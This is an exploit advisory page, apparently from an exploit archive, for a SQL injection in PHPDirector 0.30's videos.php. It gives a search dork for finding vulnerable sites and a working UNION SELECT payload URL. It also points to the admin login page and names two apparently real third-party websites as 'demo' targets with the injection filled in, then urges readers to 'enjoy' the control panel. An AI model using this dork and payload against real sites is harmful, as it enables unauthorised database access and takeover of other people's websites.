PHPDirector 0.30 remote SQL injection

2010.06.30
Credit: Mr-AbdoX
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

====================================================================== PHPDirector 0.30 (videos.php) SQL Injection Vulnerability # ====================================================================== # Date : 29/06/2010 # # Author : Mr-AbdoX # # Emails : Y6u@HoTmaiL.Com & Oz1@HoTmaiL.Com # # My web Sites : http://Sec-Eviles.com/vb & http://Arspam.com/ # # Script home : www.phpdirector.co.uk/ # # Tested on : Linux & Windows # =================Exploit============================================== Dork: [Powered by: PHPDirector 0.30] 0r [ inurl:videos.php?id= ] [~] ExploiT [~] http://www.site.com/videos.php?id=[SQL] union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- [~] ConTroL Panel (admin login) [~] http://www.site.com/login.php [~] demo [~] http://www.onevent.biz/paramore/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- http://www.videoindirizle.com/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- enjoy in control panel Like U WanT :p Don't Forget greetz Me... Peace [~] GreetZ To [~] The Invisible , Dr.Html , Mehdiz , Mr-Yasen , The S3r!0uS , Dr.Solo , ProF.Sellim & All Morrocans H4xorz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top